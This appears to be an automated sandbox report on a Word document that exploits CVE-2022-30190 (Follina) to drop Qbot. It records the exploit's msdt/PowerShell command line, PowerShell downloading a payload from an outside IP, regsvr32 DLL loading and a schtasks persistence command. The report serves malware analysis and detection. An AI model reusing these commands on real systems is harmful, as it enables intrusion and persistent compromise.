                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.620670080 CEST1301INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:15.807533026 CEST1303OUTGET /123.RES HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            If-None-Match: "6299dd5d-1861"
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.836622953 CEST1303INHTTP/1.1 304 Not Modified
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Jun 7, 2022 19:50:15.843090057 CEST1303OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.871623039 CEST1304INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:16.061703920 CEST1304OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:16.090388060 CEST1305INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:16 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:18.555954933 CEST1305OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:18.584733009 CEST1305INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:18 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes


Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
2  192.168.2.5  49865  185.234.247.119  80  C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp  kBytes transferred  Direction  Data
Jun 7, 2022 19:51:26.283952951 CEST  12199  OUT  GET /972639944.dat HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:51:26.452574015 CEST  12201  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:51:26 GMT
Content-Type: application/octet-stream
Content-Length: 1437696
Connection: keep-alive
Accept-Ranges: bytes
Expires: 0
Cache-Control: no-cache, no-store, must-revalidate
Content-Disposition: attachment;
                                                                                                                                                                                            Data Ascii: o8tAPQSuH@T$SVWUJYqtC?9t7H;Ou@W1:u@B-tuKu]_^[D$8PHtAPQT$2=, Qv=( QwL$PQXD$H'=, Qv=( Q



                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:19:50:04
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                            Imagebase:0x10a0000
                                                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:19:50:11
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:19:50:11
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:19:50:17
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                                            Imagebase:0x870000
                                                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:19:50:52
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:19:50:54
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                                                                                                                                                                                            Imagebase:0x3c0000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                            Start time:19:51:00
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:19:51:02
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                                                                                                                                                                                            Imagebase:0x3c0000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                            Start time:19:51:27
                                                                                                                                                                                            Start date:07/06/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
Imagebase:0x9d0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:28
Start time:19:51:28
Start date:07/06/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
Imagebase:0x9d0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:29
Start time:19:51:29
Start date:07/06/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
Imagebase:0x9d0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:30
Start time:19:51:42
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
Imagebase:0x270000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

Target ID:31
Start time:19:51:56
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
Imagebase:0x3c0000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:32
Start time:19:51:59
Start date:07/06/2022
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x850000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:33
Start time:19:51:59
Start date:07/06/2022
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x850000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:34
Start time:19:52:01
Start date:07/06/2022
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x850000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:35
Start time:19:52:04
Start date:07/06/2022
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
Imagebase:0xec0000
File size:185856 bytes
MD5 hash:15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:36
Start time:19:52:05
Start date:07/06/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff77f440000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                            Start time:19:52:07
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                                                                                                                                                                                            Imagebase:0x7ff6a0db0000
                                                                                                                                                                                            File size:24064 bytes
                                                                                                                                                                                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                            Start time:19:52:10
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline: -s "C:\Users\user\AppData\Local\Temp\t1.A"
                                                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi


Execution Graph

Execution Coverage:6.2%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:3.5%
Total number of Nodes:2000
Total number of Limit Nodes:53
RtlAllocateHeap 14918->14921 14920 49a084c 14921->14920 13332 49959b1 13333 4999d18 4 API calls 13332->13333 13334 49959c9 13333->13334 13350 4995ab2 13334->13350 13351 4998bde RtlAllocateHeap 13334->13351 13336 49959e0 13337 4999dd8 2 API calls 13336->13337 13336->13350 13338 49959f8 13337->13338 13339 4999e12 2 API calls 13338->13339 13340 4995a0d 13339->13340 13341 4998b9c 2 API calls 13340->13341 13342 4995a15 13341->13342 13343 4998bf4 2 API calls 13342->13343 13344 4995a30 13343->13344 13345 499b5fb 2 API calls 13344->13345 13347 4995a3e 13345->13347 13346 499bfdb 11 API calls 13346->13347 13347->13346 13348 4995aa7 13347->13348 13349 4998bf4 2 API calls 13348->13349 13349->13350 13351->13336 13043 499632e 13044 499633e ExitProcess 13043->13044 13383 49929a1 13384 4992a06 13383->13384 13389 49929b5 13383->13389 13385 49929f5 13384->13385 13395 4991b48 13384->13395 13387 4999c2c 2 API calls 13385->13387 13388 4992a20 13387->13388 13389->13385 13390 499aa65 6 API calls 13389->13390 13391 49929e2 13390->13391 13392 499aa65 6 API calls 13391->13392 13393 49929ed 13392->13393 13394 499aa65 6 API calls 13393->13394 13394->13385 13396 4991b5d 13395->13396 13397 4991bc7 13396->13397 13399 499a065 GetSystemTimeAsFileTime 13396->13399 13401 4991c58 13396->13401 13398 499a065 GetSystemTimeAsFileTime 13397->13398 13400 4991bd1 GetCurrentThread 13398->13400 13399->13396 13403 4991bf8 DuplicateHandle 13400->13403 13401->13385 13404 4998d6d memset 13403->13404 13405 4991c0b 13404->13405 13415 4992c5b 13405->13415 13409 4991c3e 13410 4991c4d 13409->13410 13449 4996d74 13409->13449 13413 4998bf4 2 API calls 13410->13413 13411 4991c2b 13411->13409 13414 499aa65 6 API calls 13411->13414 13413->13401 13414->13409 13416 499a9b8 4 API calls 13415->13416 13417 4992c64 13416->13417 13418 4991c1b 13417->13418 13419 4992be4 9 API calls 13417->13419 13424 49919ec 13418->13424 13422 4992c79 13419->13422 13420 4992c94 13420->13418 13421 4999880 RtlAllocateHeap 13420->13421 13421->13418 
13422->13420 13423 4999880 RtlAllocateHeap 13422->13423 13423->13420 13425 4991a0c 13424->13425 13426 4991a50 13424->13426 13427 499a9b8 4 API calls 13425->13427 13428 499a96c 4 API calls 13426->13428 13441 4991ac6 13426->13441 13430 4991a14 13427->13430 13432 4991a73 13428->13432 13431 499a96c 4 API calls 13430->13431 13435 4991a20 13431->13435 13433 4991aab 13432->13433 13480 49916e5 13432->13480 13484 499158a 13433->13484 13434 4991ace 13434->13411 13437 4991a3d 13435->13437 13476 4999edb 13435->13476 13436 4991b2e 13439 4998bf4 2 API calls 13436->13439 13440 4998bf4 2 API calls 13437->13440 13439->13434 13440->13426 13441->13434 13495 499171a 13441->13495 13445 4999edb memset 13447 4991adf 13445->13447 13446 4999edb memset 13446->13433 13447->13434 13447->13436 13447->13445 13448 499158a 7 API calls 13447->13448 13448->13447 13450 4998bf4 2 API calls 13449->13450 13451 4996d94 13450->13451 13452 4998bf4 2 API calls 13451->13452 13453 4996d9e 13452->13453 13454 4998bf4 2 API calls 13453->13454 13455 4996da8 13454->13455 13456 4998bf4 2 API calls 13455->13456 13457 4996db2 13456->13457 13458 4998bf4 2 API calls 13457->13458 13459 4996dbc 13458->13459 13460 4998bf4 2 API calls 13459->13460 13461 4996dc6 13460->13461 13462 4998bf4 2 API calls 13461->13462 13470 4996dd0 13462->13470 13463 4996e6e 13467 4998bf4 2 API calls 13463->13467 13464 4998bf4 2 API calls 13468 4996e85 13464->13468 13465 4998bf4 2 API calls 13469 4996e36 13465->13469 13466 4998bf4 2 API calls 13473 4996e3e 13466->13473 13471 4996e76 13467->13471 13468->13410 13472 4998bf4 2 API calls 13469->13472 13470->13473 13474 4998bf4 HeapFree memset 13470->13474 13475 4996e28 13470->13475 13471->13464 13472->13473 13473->13463 13473->13466 13473->13471 13474->13470 13475->13465 13477 4999ee7 13476->13477 13478 4999f0c 13477->13478 13479 4999f00 memset 13477->13479 13478->13437 13479->13478 13481 49916ee 13480->13481 13482 49a3674 2 API calls 13481->13482 13483 499170c 13481->13483 13482->13481 
13483->13446 13485 499a065 GetSystemTimeAsFileTime 13484->13485 13486 49915a5 13485->13486 13487 499a065 GetSystemTimeAsFileTime 13486->13487 13488 49915ad 13487->13488 13489 499a205 6 API calls 13488->13489 13491 49915d2 13489->13491 13490 49915da 13490->13441 13491->13490 13492 499161a 13491->13492 13493 499a065 GetSystemTimeAsFileTime 13491->13493 13494 499a15b 2 API calls 13492->13494 13493->13491 13494->13490 13532 499ab05 13495->13532 13498 4991774 13499 4998bf4 2 API calls 13498->13499 13501 499178a 13499->13501 13502 4991080 2 API calls 13501->13502 13503 4991794 13502->13503 13504 499b1a4 7 API calls 13503->13504 13505 49917af 13504->13505 13506 4998b9c 2 API calls 13505->13506 13507 49917bd 13506->13507 13508 4991828 13507->13508 13509 4991080 2 API calls 13507->13509 13520 4991830 13508->13520 13539 4998bde RtlAllocateHeap 13508->13539 13511 49917cc 13509->13511 13513 4998f2e 4 API calls 13511->13513 13512 4991843 13524 499a96c 4 API calls 13512->13524 13527 49919b8 13512->13527 13514 49917dc 13513->13514 13516 4998b9c 2 API calls 13514->13516 13515 4998bf4 2 API calls 13517 49919cb 13515->13517 13518 49917e9 13516->13518 13519 4998bf4 2 API calls 13517->13519 13521 4991663 3 API calls 13518->13521 13523 4991805 13518->13523 13519->13520 13520->13447 13521->13523 13522 4998bf4 2 API calls 13525 499181e 13522->13525 13523->13522 13531 499191d 13524->13531 13526 49992de 6 API calls 13525->13526 13526->13508 13527->13515 13528 49a3674 2 API calls 13528->13531 13529 499198e 13529->13527 13530 49916e5 2 API calls 13529->13530 13530->13529 13531->13528 13531->13529 13533 499ab20 4 API calls 13532->13533 13534 4991758 13533->13534 13534->13498 13535 4991663 13534->13535 13536 4991680 13535->13536 13537 4998c72 3 API calls 13536->13537 13538 49916d5 13536->13538 13537->13536 13538->13498 13539->13512 13580 49928a4 13581 49928ba 13580->13581 13598 4992959 13580->13598 13582 499c307 2 API calls 13581->13582 13584 49928c7 13582->13584 13583 4999c2c 2 API calls 
